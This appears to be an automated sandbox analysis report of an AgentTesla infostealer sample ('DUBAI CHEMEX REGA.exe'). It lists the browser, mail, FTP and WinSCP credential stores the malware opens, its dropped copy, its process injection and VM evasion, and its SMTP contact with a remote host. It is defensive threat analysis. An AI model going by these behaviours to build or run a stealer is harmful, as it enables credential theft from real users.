                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exe VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Runtime.Remoting\v4.0_4.0.0.0__b77a5c561934e089\System.Runtime.Remoting.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
                      Source: C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                      Stealing of Sensitive Information:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.665376821.0000000004579000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.746129783.00000000039B8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.909140573.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.909153388.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DUBAI CHEMEX REGA.exe PID: 3120, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AlxpSuW.exe PID: 7044, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DUBAI CHEMEX REGA.exe PID: 6900, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AlxpSuW.exe PID: 6564, type: MEMORY
                      Source: Yara matchFile source: 9.2.AlxpSuW.exe.3a3edf8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.DUBAI CHEMEX REGA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.AlxpSuW.exe.3a3edf8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DUBAI CHEMEX REGA.exe.45fedf8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DUBAI CHEMEX REGA.exe.45fedf8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.AlxpSuW.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.AlxpSuW.exe.39d27d8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DUBAI CHEMEX REGA.exe.45927d8.2.raw.unpack, type: UNPACKEDPE
                      Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
                      Tries to harvest and steal browser information (history, passwords, etc)Show sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Tries to harvest and steal ftp login credentialsShow sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
                      Tries to steal Mail credentials (via file access)Show sources
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\DUBAI CHEMEX REGA.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                      Source: Yara matchFile source: 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DUBAI CHEMEX REGA.exe PID: 3120, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AlxpSuW.exe PID: 7044, type: MEMORY

                      Remote Access Functionality:

                      barindex
                      Yara detected AgentTeslaShow sources
                      Source: Yara matchFile source: 00000000.00000002.665376821.0000000004579000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.746129783.00000000039B8000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.909140573.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.909153388.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DUBAI CHEMEX REGA.exe PID: 3120, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AlxpSuW.exe PID: 7044, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: DUBAI CHEMEX REGA.exe PID: 6900, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: AlxpSuW.exe PID: 6564, type: MEMORY
                      Source: Yara matchFile source: 9.2.AlxpSuW.exe.3a3edf8.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.DUBAI CHEMEX REGA.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.AlxpSuW.exe.3a3edf8.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DUBAI CHEMEX REGA.exe.45fedf8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DUBAI CHEMEX REGA.exe.45fedf8.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.AlxpSuW.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.AlxpSuW.exe.39d27d8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.DUBAI CHEMEX REGA.exe.45927d8.2.raw.unpack, type: UNPACKEDPE

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid AccountsWindows Management Instrumentation211Registry Run Keys / Startup Folder1Process Injection112Disable or Modify Tools1OS Credential Dumping2System Information Discovery114Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsRegistry Run Keys / Startup Folder1Deobfuscate/Decode Files or Information1Input Capture211Query Registry1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information3Credentials in Registry1Security Software Discovery311SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing3NTDSProcess Discovery2Distributed Component Object ModelInput Capture211Scheduled TransferApplication Layer Protocol11SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading1LSA SecretsVirtualization/Sandbox Evasion131SSHClipboard Data1Data Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion131Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 385489 Sample: DUBAI CHEMEX REGA.exe Startdate: 12/04/2021 Architecture: WINDOWS Score: 100 37 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->37 39 Found malware configuration 2->39 41 Multi AV Scanner detection for submitted file 2->41 43 8 other signatures 2->43 6 DUBAI CHEMEX REGA.exe 3 2->6         started        10 AlxpSuW.exe 3 2->10         started        12 AlxpSuW.exe 2->12         started        process3 file4 21 C:\Users\user\...\DUBAI CHEMEX REGA.exe.log, ASCII 6->21 dropped 45 Injects a PE file into a foreign processes 6->45 14 DUBAI CHEMEX REGA.exe 2 9 6->14         started        47 Multi AV Scanner detection for dropped file 10->47 49 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 10->49 51 Machine Learning detection for dropped file 10->51 53 Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines) 10->53 19 AlxpSuW.exe 2 10->19         started        signatures5 process6 dnsIp7 27 webmail.satguruclearing.com 208.91.199.135, 49763, 49764, 587 PUBLIC-DOMAIN-REGISTRYUS United States 14->27 23 C:\Users\user\AppData\Roaming\...\AlxpSuW.exe, PE32 14->23 dropped 25 C:\Users\user\...\AlxpSuW.exe:Zone.Identifier, ASCII 14->25 dropped 29 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 14->29 31 Tries to steal Mail credentials (via file access) 14->31 33 Tries to harvest and steal ftp login credentials 14->33 35 3 other signatures 14->35 file8 signatures9

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      DUBAI CHEMEX REGA.exe25%ReversingLabsByteCode-MSIL.Trojan.AgentTesla
                      DUBAI CHEMEX REGA.exe100%Joe Sandbox ML

                      Dropped Files

                      SourceDetectionScannerLabelLink
                      C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe100%Joe Sandbox ML
                      C:\Users\user\AppData\Roaming\AlxpSuW\AlxpSuW.exe25%ReversingLabsByteCode-MSIL.Trojan.AgentTesla

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      4.2.DUBAI CHEMEX REGA.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File
                      10.2.AlxpSuW.exe.400000.0.unpack100%AviraTR/Spy.Gen8Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      webmail.satguruclearing.com1%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://127.0.0.1:HTTP/1.10%Avira URL Cloudsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/l~0%Avira URL Cloudsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.tiro.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/C~0%Avira URL Cloudsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://www.goodfont.co.kr0%URL Reputationsafe
                      http://fhHdHb.com0%Avira URL Cloudsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.sajatypeworks.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/90%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.typography.netD0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://fontfabrik.com0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/5~0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/Y0o0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/Q~)M0%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/5~0%Avira URL Cloudsafe
                      http://www.fonts.comn0%URL Reputationsafe
                      http://www.fonts.comn0%URL Reputationsafe
                      http://www.fonts.comn0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      https://api.ipify.org%GETMozilla/5.00%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.sandoll.co.kr0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.urwpp.deDPlease0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/.~6M0%Avira URL Cloudsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.zhongyicts.com.cn0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      http://www.sakkal.com0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://api.ipify.org%0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://DynDns.comDynDNS0%URL Reputationsafe
                      http://www.fontbureau.comue0%Avira URL Cloudsafe
                      http://www.founder.com.cn/cnrig)E0%Avira URL Cloudsafe
                      http://www.fonts.comc0%URL Reputationsafe
                      http://www.fonts.comc0%URL Reputationsafe
                      http://www.fonts.comc0%URL Reputationsafe
                      http://www.founder.com.cn/cnLog0%Avira URL Cloudsafe
                      https://Ii19E5Eebc4fe8K8ng5D.com0%Avira URL Cloudsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/dd80%Avira URL Cloudsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/jp/0%URL Reputationsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      http://www.fontbureau.coma0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.carterandcone.coml0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.founder.com.cn/cn0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
                      http://www.jiyu-kobo.co.jp/0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      webmail.satguruclearing.com
                      208.91.199.135
                      truetrueunknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://127.0.0.1:HTTP/1.1DUBAI CHEMEX REGA.exe, 00000004.00000002.911263049.0000000002B71000.00000004.00000001.sdmp, AlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      low
                      http://www.fontbureau.com/designersGDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                        high
                        http://www.fontbureau.com/designers/?DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                          high
                          http://www.founder.com.cn/cn/bTheDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          unknown
                          http://www.fontbureau.com/designers?DUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                            high
                            http://www.jiyu-kobo.co.jp/l~DUBAI CHEMEX REGA.exe, 00000000.00000003.649527166.0000000006383000.00000004.00000001.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4DUBAI CHEMEX REGA.exe, 00000000.00000002.664563832.000000000339A000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741183439.00000000027DC000.00000004.00000001.sdmpfalse
                              high
                              http://www.tiro.comAlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              unknown
                              http://www.jiyu-kobo.co.jp/C~DUBAI CHEMEX REGA.exe, 00000000.00000003.649849888.000000000638C000.00000004.00000001.sdmpfalse
                              • Avira URL Cloud: safe
                              unknown
                              http://www.fontbureau.com/designersAlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                high
                                http://www.goodfont.co.krDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                http://fhHdHb.comAlxpSuW.exe, 0000000A.00000002.910963365.0000000003201000.00000004.00000001.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.cssDUBAI CHEMEX REGA.exe, 00000000.00000002.664541642.0000000003381000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.741126162.00000000027C1000.00000004.00000001.sdmpfalse
                                  high
                                  http://www.sajatypeworks.comDUBAI CHEMEX REGA.exe, 00000000.00000002.669646935.00000000075D2000.00000004.00000001.sdmp, AlxpSuW.exe, 00000009.00000002.749806133.0000000005870000.00000002.00000001.sdmpfalse
                                  • URL Reputation: safe
                                  • URL Reputation: safe
                                  • URL Reputation: safe
